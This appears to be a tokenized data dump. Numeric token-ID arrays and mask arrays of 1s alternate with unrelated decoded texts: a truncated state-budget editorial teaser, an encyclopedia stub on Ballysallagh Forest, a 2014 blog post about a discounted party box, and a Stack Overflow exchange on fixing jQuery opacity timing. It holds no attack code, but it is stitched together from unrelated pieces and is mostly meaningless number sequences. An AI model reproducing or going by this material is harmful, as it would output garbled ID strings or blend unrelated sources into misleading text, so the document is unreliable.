29899, 5965, 5086, 10916, 447, 2356, 2694, 5465, 408, 278, 2446, 28156, 19017, 29892, 23610, 1716, 2694, 5465, 322, 670, 6532, 373, 263, 3652, 310, 29197, 260, 2470, 297, 14933, 322, 6813, 29892, 988, 896, 892, 4520, 408, 4207, 4395, 28865, 16978, 896, 3512, 29889, 13, 13, 1576, 1781, 3064, 2996, 304, 263, 25212, 297, 29871, 29896, 29929, 29941, 29906, 29892, 746, 9556, 4934, 385, 8271, 393, 2175, 278, 11409, 275, 408, 278, 10150, 2323, 6263, 297, 278, 9320, 24403, 29889, 512, 5490, 29871, 29896, 29929, 29941, 29941, 29892, 7178, 379, 10060, 3074, 23610, 22433, 3729, 272, 23151, 304, 883, 263, 5874, 29889, 512, 4779, 29892, 2694, 5465, 620, 12961, 599, 310, 670, 5332, 11803, 322, 4433, 363, 408, 2904, 398, 297, 278, 3303, 3900, 29889, 450, 2446, 2462, 30010, 29879, 2343, 1220, 297, 278, 25912, 24302, 22801, 1303, 29901, 1346, 18420, 10130, 3645, 2694, 5465, 29901, 940, 29489, 30010, 29873, 422, 292, 7437, 8530, 13, 13, 1576, 29871, 29945, 29946, 29899, 6360, 29899, 1025, 27813, 997, 545, 403, 723, 2360, 731, 3661, 297, 670, 7531, 9556, 1449, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Our opinion: The state budget pays attention to political business, but there’s still some key public business to be done. And here we thought state officials were finally figuring out that competence …
[ 1, 8680, 9426, 29901, 450, 2106, 23562, 9744, 8570, 304, 8604, 5381, 29892, 541, 727, 30010, 29879, 1603, 777, 1820, 970, 5381, 304, 367, 2309, 29889, 1126, 1244, 591, 2714, 2106, 24921, 892, 7146, 2537, 3864, 714, 393, 5100, 663, 16088 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Ballysallagh Forest Ballysallagh Forest is a predominantly coniferous forest located near Bangor, Northern Ireland. It has a small section of broadleaved trees at Cairn Wood. The forest is managed by the Forest Service Northern Ireland. In October 2014 more than 20 hectares (representing approximately 7000 trees) were felled in an attempt to control an outbreak of the tree disease Phytophthora ramorum. The affected area included Cairn Wood which is popular with walkers. References Category:Forests and woodlands of Northern Ireland
[ 1, 350, 635, 29879, 497, 21705, 17300, 13, 13, 29933, 635, 29879, 497, 21705, 17300, 338, 263, 758, 24130, 10835, 378, 9633, 681, 13569, 5982, 2978, 14320, 272, 29892, 14299, 12126, 29889, 739, 756, 263, 2319, 4004, 310, 7300, 280, 10511, 10697, 472, 315, 1466, 29876, 10180, 29889, 450, 13569, 338, 8745, 491, 278, 29871, 17300, 6692, 14299, 12126, 29889, 13, 13, 797, 5533, 29871, 29906, 29900, 29896, 29946, 901, 1135, 29871, 29906, 29900, 28834, 5114, 313, 276, 6338, 292, 14235, 29871, 29955, 29900, 29900, 29900, 10697, 29897, 892, 7995, 839, 297, 385, 4218, 304, 2761, 385, 714, 8690, 310, 278, 5447, 17135, 1963, 3637, 3021, 386, 2207, 13472, 17220, 29889, 450, 15201, 4038, 5134, 315, 1466, 29876, 10180, 607, 338, 5972, 411, 6686, 414, 29889, 13, 13, 1123, 10662, 13, 13, 10900, 29901, 2831, 9197, 322, 8112, 5252, 310, 14299, 12126 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
28 February 2014 Love Mae instant garden party box 50% off Gorgeous Australian fabric decal brand Love Mae are discontinuing their party ware and this lovely garden party box is now 50% off! $30 will get you a 12 pack of plates, 12 pack of cups, 24 cupcake cases, 12 cake bags, 25 blue and 25 pink paper straws and a sheet of wrapping paper. You'll also find a party decoration tutorial that the birthday girl might be able to craft up for the lovely day. Perfect. (You can find the individual pieces in the pack on sale on the website too). Hurry before they get snapped up! CREDITS BONDVILLE BLOG - blog.stephbond.com Please do not use any content from this site on your blog or website without clearly noting its origins and linking back to the original blog post. I reserve the right to restrict comments that do not contribute constructively to the conversation at hand, contain profanity, personal attacks or seek to promote a personal or unrelated business. Any comments submitted anonymously will be restricted at my discretion.
[ 1, 29871, 29906, 29947, 6339, 29871, 29906, 29900, 29896, 29946, 13, 13, 29931, 994, 3219, 29872, 14426, 16423, 6263, 3800, 29871, 29945, 29900, 29995, 1283, 13, 13, 29954, 3890, 681, 9870, 18187, 316, 1052, 14982, 8155, 3219, 29872, 526, 766, 20621, 292, 1009, 6263, 281, 598, 322, 445, 12355, 873, 16423, 6263, 3800, 338, 1286, 29871, 29945, 29900, 29995, 1283, 29991, 395, 29941, 29900, 674, 679, 366, 263, 29871, 29896, 29906, 4870, 310, 715, 1078, 29892, 29871, 29896, 29906, 4870, 310, 2723, 567, 29892, 29871, 29906, 29946, 18002, 1113, 446, 4251, 29892, 29871, 29896, 29906, 274, 1296, 289, 810, 29892, 29871, 29906, 29945, 7254, 322, 29871, 29906, 29945, 282, 682, 5650, 380, 1610, 29879, 322, 263, 9869, 310, 28489, 5650, 29889, 887, 29915, 645, 884, 1284, 263, 6263, 10200, 362, 9673, 393, 278, 12060, 3250, 7826, 1795, 367, 2221, 304, 25554, 701, 363, 278, 12355, 873, 2462, 29889, 2431, 3647, 29889, 313, 3492, 508, 1284, 278, 5375, 12785, 297, 278, 4870, 373, 14686, 373, 278, 4700, 2086, 467, 22220, 719, 1434, 896, 679, 5807, 17280, 701, 29991, 13, 13, 29907, 19386, 1806, 29903, 13, 13, 29933, 1164, 29928, 29963, 6227, 1307, 350, 14480, 448, 12618, 29889, 1655, 561, 29890, 898, 29889, 510, 13, 13, 12148, 437, 451, 671, 738, 2793, 515, 445, 3268, 373, 596, 12618, 470, 4700, 1728, 9436, 451, 292, 967, 1677, 1144, 322, 25236, 1250, 304, 278, 2441, 12618, 1400, 29889, 306, 23986, 278, 1492, 304, 9250, 6589, 393, 437, 451, 29126, 3386, 3598, 304, 278, 14983, 472, 1361, 29892, 1712, 2600, 273, 537, 29892, 7333, 16661, 470, 16508, 304, 27391, 263, 7333, 470, 443, 12817, 5381, 29889, 3139, 6589, 18397, 385, 4735, 5794, 674, 367, 22078, 472, 590, 766, 4838, 291, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Q: Why is my css opacity not transitioning back to its original state of .5 with setTimeout()? I am relatively new to JS, Jquery, and CSS. I am looking to write a Simon Says style game. When I try to animate the computer to automatically light up the desired square, I do not get the desired results. My solution is to have the colored squares start at an opacity of 0.5. Each square has an ID. When that ID matches the correct number, I use $(this).css("opacity","1"); to brighten it I do not know how to get the square to automatically change back to .5 I have tried using a setTimeout() function to delay the change back. Even though the code delays It doesn't change back. I have used both an empty space and .5 as values <!DOCTYPE html> <html> <head> <title>Matchy Matchy</title> <link rel="stylesheet" type="text/css" href="simonSays.css"> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script> </head> <body> <h1>Match the Colors!</h1> <div id="banner"> <button id="reset">Reset</button> <span id="level">Level:1</span> </div> <div id="container"> <div class="square" id="1"></div> <div class="square" id="2"></div> <div class="square" id="3"></div> <div class="square" id="4"></div> <div class="square" id="5"></div> <div class="square" id="6"></div> </div> <script type="text/javascript" src="simonSays.js"></script> </body> </html> body{ background-color:black; margin:0; } h1{ color:white; text-align: center; background-color:steelblue; margin:0; } #banner{ background-color:white; margin:0; text-align: center; } #container{ max-width: 600px; margin: 20px auto; } .square{ background-color:pink; float:left; padding-bottom:30%; width:30%; margin:1.66%; opacity: 0.5; transition: opacity 0.5s; --webkit-transition: opacity 0.5s; --moz-transition: opacity 0.5s; } //variables var level = 1; //add event listeners for player use //probably can make a class and use toggle to shorten code $(".square").on("click",function(){ $(this).css("opacity","1"); }); $(".square").on("mouseleave",function(){ $(this).css("opacity",".5"); }); init(); doLevel(level); //test function init(){ //go through all squares and add a random color as background $(".square").each(function(i, obj){ $(obj).css("backgroundColor", generateRandomColor()); }); } function doLevel(level){ //get the colors to copy var pattern = selectColors(level); //showPattern(pattern); //test console.log(pattern[0]); } function generateRandomColor(){ var color = ""; var r = Math.floor(Math.random() * 256); var g = Math.floor(Math.random() * 256); var b = Math.floor(Math.random() * 256); var color = "rgb(" + r + ", " + g + ", " + b + ")"; return color; } function selectColors(amount){ //declare array to hold values var order = []; //loop through amount for(var i = 0; i < amount; i++){ order.push(Math.floor(Math.random() * 6 + 1)); } return order; } function showPattern(pattern){ //for each number in pattern, for(var i = 0; i < pattern.length; i++){ //for each square on the screen $(".square").each(function(j,obj){ var $this = $(this); //settimeout changes to global, so I am declaring locally here //if the ID is equal to the pattern number if(parseInt($(this).attr("id")) === parseInt(pattern[i])){ //brighten console.log("light up"); $(this).css("opacity","1"); //dim setTimeout(function(){ console.log("changing back"); $this.css("opacity",".5"); }, 3000); } }) } } I expect the opacity to go back to .5, but the style is staying as 1. Nothing I try changes it back. So one I am looking to understand why it won't change, And two, if there is a better way to implement this I would love to know. thanks! A: setTimeout resets the this pointer to the global scope and you will end up with issues. If you use the object in the each call all is well in the world ;) Also keep in mind that opacity is a number value so no need for quotes when setting it. $(document).ready(() => { $('.square').each((i, e) => { $(e).css('opacity', 1); setTimeout(() => { $(e).css('opacity', 0.5) }, 3000) }); }); .square{ width: 50px; height: 50px; opacity: 0.5; background: #000; margin-bottom: 2px; } <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <div class="square"></div> <div class="square"></div> <div class="square"></div> <div class="square"></div> Another option for fun is to use jQuery animate. $(document).ready(() => { $('.square').each((i, e) => { $(e).css('opacity', 1).animate({ opacity: 0.5 }, 3000); }); }); .square{ width: 50px; height: 50px; opacity: 0.5; background: #000; margin-bottom: 2px; } <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <div class="square"></div> <div class="square"></div> <div class="square"></div> <div class="square"></div>
[ 1, 660, 29901, 13, 13, 11008, 338, 590, 5997, 17012, 451, 9558, 292, 1250, 304, 967, 2441, 2106, 310, 869, 29945, 411, 23597, 580, 29973, 13, 13, 29902, 626, 13774, 716, 304, 7649, 29892, 435, 1972, 29892, 322, 6783, 29889, 13, 29902, 626, 3063, 304, 2436, 263, 11254, 317, 1036, 3114, 3748, 29889, 1932, 306, 1018, 304, 26015, 278, 6601, 304, 6336, 3578, 701, 278, 7429, 6862, 29892, 306, 437, 451, 679, 278, 7429, 2582, 29889, 13, 3421, 1650, 338, 304, 505, 278, 28684, 25256, 1369, 472, 385, 17012, 310, 29871, 29900, 29889, 29945, 29889, 13, 9760, 6862, 756, 385, 3553, 29889, 1932, 393, 3553, 7087, 278, 1959, 1353, 29892, 306, 671, 13, 12330, 1366, 467, 4268, 703, 28193, 3284, 29896, 1496, 304, 11785, 264, 372, 13, 29902, 437, 451, 1073, 920, 304, 679, 278, 6862, 304, 6336, 1735, 1250, 304, 869, 29945, 13, 29902, 505, 1898, 773, 263, 23597, 580, 740, 304, 9055, 278, 1735, 1250, 29889, 7753, 2466, 278, 775, 628, 1036, 739, 1838, 29915, 29873, 1735, 1250, 29889, 306, 505, 1304, 1716, 385, 4069, 2913, 322, 869, 29945, 408, 1819, 13, 29966, 29991, 21300, 3472, 29958, 13, 29966, 1420, 29958, 13, 29966, 2813, 29958, 13, 1678, 529, 3257, 29958, 9652, 29891, 14514, 29891, 829, 3257, 29958, 13, 1678, 529, 2324, 1104, 543, 13558, 29908, 1134, 543, 726, 29914, 4268, 29908, 2822, 543, 3601, 265, 29903, 1036, 29889, 4268, 1013, 13, 1678, 529, 2154, 1134, 543, 726, 29914, 7729, 29908, 4765, 543, 991, 597, 29062, 29889, 28260, 29889, 510, 29914, 6538, 29914, 10254, 29914, 5880, 29914, 29941, 29889, 29946, 29889, 29896, 29914, 5880, 29889, 1315, 5319, 2154, 29958, 13, 829, 2813, 29958, 13, 29966, 2587, 29958, 13, 1678, 529, 29882, 29896, 29958, 9652, 278, 29183, 29991, 829, 29882, 29896, 29958, 13, 1678, 529, 4563, 1178, 543, 29890, 7310, 1013, 13, 4706, 529, 3092, 1178, 543, 12071, 1013, 27175, 829, 3092, 29958, 13, 4706, 529, 9653, 1178, 543, 5563, 1013, 10108, 29901, 29896, 829, 9653, 29958, 13, 1678, 1533, 4563, 29958, 13, 1678, 529, 4563, 1178, 543, 7611, 1013, 13, 4706, 529, 4563, 770, 543, 17619, 29908, 1178, 543, 29896, 5319, 4563, 29958, 13, 4706, 529, 4563, 770, 543, 17619, 29908, 1178, 543, 29906, 5319, 4563, 29958, 13, 4706, 529, 4563, 770, 543, 17619, 29908, 1178, 543, 29941, 5319, 4563, 29958, 13, 4706, 529, 4563, 770, 543, 17619, 29908, 1178, 543, 29946, 5319, 4563, 29958, 13, 4706, 529, 4563, 770, 543, 17619, 29908, 1178, 543, 29945, 5319, 4563, 29958, 13, 4706, 529, 4563, 770, 543, 17619, 29908, 1178, 543, 29953, 5319, 4563, 29958, 13, 1678, 1533, 4563, 29958, 13, 13, 29966, 2154, 1134, 543, 726, 29914, 7729, 29908, 4765, 543, 3601, 265, 29903, 1036, 29889, 1315, 5319, 2154, 29958, 13, 13, 829, 2587, 29958, 13, 829, 1420, 29958, 13, 13, 2587, 29912, 13, 1678, 3239, 29899, 2780, 29901, 8517, 29936, 13, 1678, 5906, 29901, 29900, 29936, 13, 29913, 13, 13, 29882, 29896, 29912, 13, 1678, 2927, 29901, 10921, 29936, 13, 1678, 1426, 29899, 2520, 29901, 4818, 29936, 13, 1678, 3239, 29899, 2780, 29901, 1655, 295, 9539, 29936, 13, 1678, 5906, 29901, 29900, 29936, 13, 29913, 13, 13, 29937, 29890, 7310, 29912, 13, 1678, 3239, 29899, 2780, 29901, 10921, 29936, 13, 1678, 5906, 29901, 29900, 29936, 13, 1678, 1426, 29899, 2520, 29901, 4818, 29936, 13, 29913, 13, 13, 29937, 7611, 29912, 13, 1678, 4236, 29899, 2103, 29901, 29871, 29953, 29900, 29900, 1756, 29936, 13, 1678, 5906, 29901, 29871, 29906, 29900, 1756, 4469, 29936, 13, 29913, 13, 13, 29889, 17619, 29912, 13, 1678, 3239, 29899, 2780, 29901, 29886, 682, 29936, 13, 1678, 5785, 29901, 1563, 29936, 13, 1678, 7164, 29899, 8968, 29901, 29941, 29900, 8874, 13, 1678, 2920, 29901, 29941, 29900, 8874, 13, 1678, 5906, 29901, 29896, 29889, 29953, 29953, 8874, 13, 1678, 17012, 29901, 29871, 29900, 29889, 29945, 29936, 13, 1678, 9558, 29901, 17012, 29871, 29900, 29889, 29945, 29879, 29936, 13, 1678, 1192, 14085, 29899, 20543, 29901, 17012, 29871, 29900, 29889, 29945, 29879, 29936, 13, 1678, 1192, 9781, 29899, 20543, 29901, 17012, 29871, 29900, 29889, 29945, 29879, 29936, 13, 29913, 13, 13, 458, 20897, 13, 1707, 3233, 353, 29871, 29896, 29936, 13, 13, 458, 1202, 1741, 11621, 414, 363, 4847, 671, 13, 458, 771, 14815, 508, 1207, 263, 770, 322, 671, 20429, 304, 3273, 264, 775, 13, 29938, 17350, 17619, 2564, 265, 703, 3808, 613, 2220, 4923, 13, 1678, 2427, 1366, 467, 4268, 703, 28193, 3284, 29896, 1496, 13, 3680, 13, 29938, 17350, 17619, 2564, 265, 703, 15769, 280, 1351, 613, 2220, 4923, 13, 259, 2427, 1366, 467, 4268, 703, 28193, 613, 1642, 29945, 1496, 29871, 13, 3680, 13, 13, 2344, 890, 13, 1867, 10108, 29898, 5563, 416, 849, 1688, 13, 13, 2220, 2069, 4923, 13, 1678, 849, 1484, 1549, 599, 25256, 322, 788, 263, 4036, 2927, 408, 3239, 13, 1678, 17575, 17619, 2564, 4204, 29898, 2220, 29898, 29875, 29892, 5446, 2597, 13, 4706, 2427, 5415, 467, 4268, 703, 29605, 613, 5706, 17875, 3306, 3310, 13, 1678, 2604, 13, 29913, 13, 13, 2220, 437, 10108, 29898, 5563, 2597, 13, 1678, 849, 657, 278, 11955, 304, 3509, 13, 1678, 722, 4766, 353, 1831, 1625, 943, 29898, 5563, 416, 13, 1678, 849, 4294, 17144, 29898, 11037, 416, 13, 1678, 849, 1688, 13, 1678, 2991, 29889, 1188, 29898, 11037, 29961, 29900, 5691, 13, 29913, 13, 13, 2220, 5706, 17875, 3306, 4923, 13, 1678, 722, 2927, 353, 12942, 13, 1678, 722, 364, 353, 5792, 29889, 14939, 29898, 11309, 29889, 8172, 580, 334, 29871, 29906, 29945, 29953, 416, 13, 1678, 722, 330, 353, 5792, 29889, 14939, 29898, 11309, 29889, 8172, 580, 334, 29871, 29906, 29945, 29953, 416, 13, 1678, 722, 289, 353, 5792, 29889, 14939, 29898, 11309, 29889, 8172, 580, 334, 29871, 29906, 29945, 29953, 416, 13, 13, 1678, 722, 2927, 353, 376, 23973, 703, 718, 364, 718, 9162, 376, 718, 330, 718, 9162, 376, 718, 289, 718, 16521, 1769, 13, 1678, 736, 2927, 29936, 13, 29913, 13, 13, 2220, 1831, 1625, 943, 29898, 14506, 2597, 13, 1678, 849, 7099, 8663, 1409, 304, 4808, 1819, 13, 1678, 722, 1797, 353, 13769, 13, 1678, 849, 7888, 1549, 5253, 13, 1678, 363, 29898, 1707, 474, 353, 29871, 29900, 29936, 474, 529, 5253, 29936, 474, 16284, 13, 4706, 1797, 29889, 5910, 29898, 11309, 29889, 14939, 29898, 11309, 29889, 8172, 580, 334, 29871, 29953, 718, 29871, 29896, 2483, 13, 1678, 500, 13, 13, 1678, 736, 1797, 29936, 13, 13, 29913, 13, 13, 2220, 1510, 17144, 29898, 11037, 2597, 13, 1678, 849, 1454, 1269, 1353, 297, 4766, 29892, 13, 1678, 363, 29898, 1707, 474, 353, 29871, 29900, 29936, 474, 529, 4766, 29889, 2848, 29936, 474, 16284, 13, 4706, 849, 1454, 1269, 6862, 373, 278, 4315, 13, 4706, 17575, 17619, 2564, 4204, 29898, 2220, 29898, 29926, 29892, 5415, 2597, 13, 9651, 722, 395, 1366, 353, 2427, 1366, 416, 849, 842, 15619, 3620, 304, 5534, 29892, 577, 306, 626, 25136, 12430, 1244, 13, 9651, 849, 361, 278, 3553, 338, 5186, 304, 278, 4766, 1353, 13, 9651, 565, 29898, 25716, 26237, 1366, 467, 5552, 703, 333, 5783, 6805, 6088, 2928, 29898, 11037, 29961, 29875, 12622, 29912, 13, 18884, 849, 1182, 523, 264, 13, 18884, 2991, 29889, 1188, 703, 4366, 701, 1496, 13, 18884, 2427, 1366, 467, 4268, 703, 28193, 3284, 29896, 1496, 13, 18884, 849, 6229, 13, 18884, 23597, 29898, 2220, 4923, 13, 462, 1678, 2991, 29889, 1188, 703, 305, 9776, 1250, 1496, 13, 462, 1678, 395, 1366, 29889, 4268, 703, 28193, 613, 1642, 29945, 1496, 13, 18884, 2981, 29871, 29941, 29900, 29900, 29900, 416, 13, 13, 9651, 500, 13, 4706, 5615, 13, 1678, 500, 13, 29913, 13, 13, 29902, 2149, 278, 17012, 304, 748, 1250, 304, 869, 29945, 29892, 541, 278, 3114, 338, 7952, 292, 408, 29871, 29896, 29889, 9531, 306, 1018, 3620, 372, 1250, 29889, 13, 6295, 697, 306, 626, 3063, 304, 2274, 2020, 372, 2113, 29915, 29873, 1735, 29892, 13, 2855, 1023, 29892, 565, 727, 338, 263, 2253, 982, 304, 2334, 445, 306, 723, 5360, 304, 1073, 29889, 13, 386, 1331, 29991, 13, 13, 29909, 29901, 13, 13, 842, 10851, 620, 1691, 278, 445, 4879, 304, 278, 5534, 6874, 322, 366, 674, 1095, 701, 411, 5626, 29889, 29871, 960, 366, 671, 278, 1203, 297, 278, 1269, 1246, 599, 338, 1532, 297, 278, 3186, 15718, 13, 17351, 3013, 297, 3458, 393, 17012, 338, 263, 1353, 995, 577, 694, 817, 363, 11839, 746, 4444, 372, 29889, 13, 13, 12330, 3225, 467, 2040, 14885, 1149, 3336, 13, 29871, 12721, 17619, 2824, 4204, 3552, 29875, 29892, 321, 29897, 1149, 3336, 13, 1678, 2427, 29872, 467, 4268, 877, 28193, 742, 29871, 29896, 6075, 13, 1678, 23597, 14885, 1149, 3336, 13, 418, 2427, 29872, 467, 4268, 877, 28193, 742, 29871, 29900, 29889, 29945, 8443, 13, 1678, 2981, 29871, 29941, 29900, 29900, 29900, 8443, 13, 29871, 24426, 13, 3680, 13, 29889, 17619, 14626, 13, 29871, 2920, 29901, 29871, 29945, 29900, 1756, 2104, 13, 29871, 3171, 29901, 29871, 29945, 29900, 1756, 2104, 13, 29871, 17012, 29901, 29871, 29900, 29889, 29945, 2104, 13, 29871, 3239, 29901, 396, 29900, 29900, 29900, 2104, 13, 29871, 5906, 29899, 8968, 29901, 29871, 29906, 1756, 2104, 13, 29913, 13, 29966, 2154, 4765, 543, 991, 597, 29062, 29889, 28260, 29889, 510, 29914, 6538, 29914, 10254, 29914, 5880, 29914, 29941, 29889, 29941, 29889, 29896, 29914, 5880, 29889, 1195, 29889, 1315, 5319, 2154, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 29958, 13, 13, 2744, 1228, 2984, 363, 2090, 338, 304, 671, 6385, 26015, 29889, 13, 